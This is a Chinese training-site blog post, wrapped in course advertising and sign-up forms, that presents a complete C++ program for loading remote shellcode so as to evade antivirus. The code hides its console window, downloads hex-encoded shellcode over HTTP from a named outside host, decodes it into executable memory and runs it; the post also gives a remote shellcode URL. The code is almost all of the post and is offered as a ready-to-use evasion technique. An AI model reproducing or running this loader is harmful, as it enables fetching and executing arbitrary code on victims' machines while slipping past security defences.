vc6.0加载远程 shellcode 实现免杀

2020年03月05日 18:24:59 作者:a123 阅读数:3111732
网络安全渗透测试北京实地培训,五个月华丽蜕变,零元入学,报名联系:15320004362(手机同微信)。全国诚招招生代理,最低2000元起
第九期开班时间:2021年3月22日

抢先领取全套VIP视频教程

+10天免费学习名额

  已有8166人参加


视频课程

姓名 选填

电话


  张*燕188****220722分钟前

  王*军186****864498分钟前

  李*如189****445354分钟前

>>  稍后老师联系您发送相关视频课程  <<



报名CTF挑战赛,  预约名师指导

  已有 2366 人参加
姓名 选填

电话


  郭*明170****234291分钟前

  赵*东189****289646分钟前

  蔡*培135****589722分钟前





   

网络安全渗透测试群(必火安全学院):信息安全渗透测试群

护网行动日薪千元(初级中级高级)群:护网行动必火业余班级


0x01: 环境:

windows xp:

vc6.0

0x02:代码:

#include <string>
#include <iostream>
#include <windows.h>
#include <winhttp.h> 
#include <stdlib.h>
#include <string.h>
#pragma comment(lib,"winhttp.lib")
#pragma comment(lib,"user32.lib")
void main()
{
    //最小化
    HWND my_consle = GetForegroundWindow();
    ShowWindow(my_consle, SW_MINIMIZE);

    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer = NULL;
    HINTERNET  hSession = NULL,
               hConnect = NULL,
               hRequest = NULL;
    BOOL  bResults = FALSE;
    hSession=WinHttpOpen(L"User Agent",WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,WINHTTP_NO_PROXY_NAME,WINHTTP_NO_PROXY_BYPASS,0);
    if(hSession)
    {
        hConnect=WinHttpConnect(hSession,L"www.hacker.wang",INTERNET_DEFAULT_HTTP_PORT,0);
    }
    if(hConnect)
    {
        hRequest=WinHttpOpenRequest(hConnect, L"GET",L"/vc/cs.txt",L"HTTP/1.1", WINHTTP_NO_REFERER,WINHTTP_DEFAULT_ACCEPT_TYPES,0);
    }
    if(hRequest)
    {
        bResults=WinHttpSendRequest(hRequest,WINHTTP_NO_ADDITIONAL_HEADERS, 0,WINHTTP_NO_REQUEST_DATA, 0, 0, 0 );
    }
    if(bResults)
    {
        bResults=WinHttpReceiveResponse(hRequest,NULL);
    }
    if(bResults)
    {
        do
        {
            // Check for available data.
             dwSize = 0;
             if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
             {
                 printf( "Error %u in WinHttpQueryDataAvailable.\n",GetLastError());
                 break;
             }
             if (!dwSize)
                 break;
              pszOutBuffer = new char[dwSize+1];
              if (!pszOutBuffer)
              {
                   printf("Out of memory\n");
                break;
              }
               ZeroMemory(pszOutBuffer, dwSize+1);
               if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer,  dwSize, &dwDownloaded))
               {
                     printf( "Error %u in WinHttpReadData.\n", GetLastError());
               }
               else
               {
                   printf("%s", pszOutBuffer);
               }
                //编写shellcode 开始
                const char* ShellCode = pszOutBuffer;
                int shellcode_length = strlen(ShellCode);

                unsigned char* value = (unsigned char*)calloc(shellcode_length/2,sizeof(unsigned char));
                for (size_t count=0;count < shellcode_length /2;count++)
                {
                    sscanf(ShellCode,"%2hhx",&value[count]);
                    ShellCode += 2;
                }
                
                void *exec = VirtualAlloc(0,shellcode_length/2,MEM_COMMIT,PAGE_EXECUTE_READWRITE);
                memcpy(exec,value,shellcode_length/2);

                printf("%s", exec);
                ((void(*)())exec)();

               // 编写shellcode 结束


               delete [] pszOutBuffer;
               if (!dwDownloaded)
                   break;
        } while (dwSize > 0);
    }
    if (hRequest) WinHttpCloseHandle(hRequest);
    if (hConnect) WinHttpCloseHandle(hConnect);
    if (hSession) WinHttpCloseHandle(hSession);
    system("pause");
}

0x03: 远程 shellcode 文件内容:

http://www.hacker.wang/vc/calc.txt

0x04:咨询安全培训请加微信:nvhack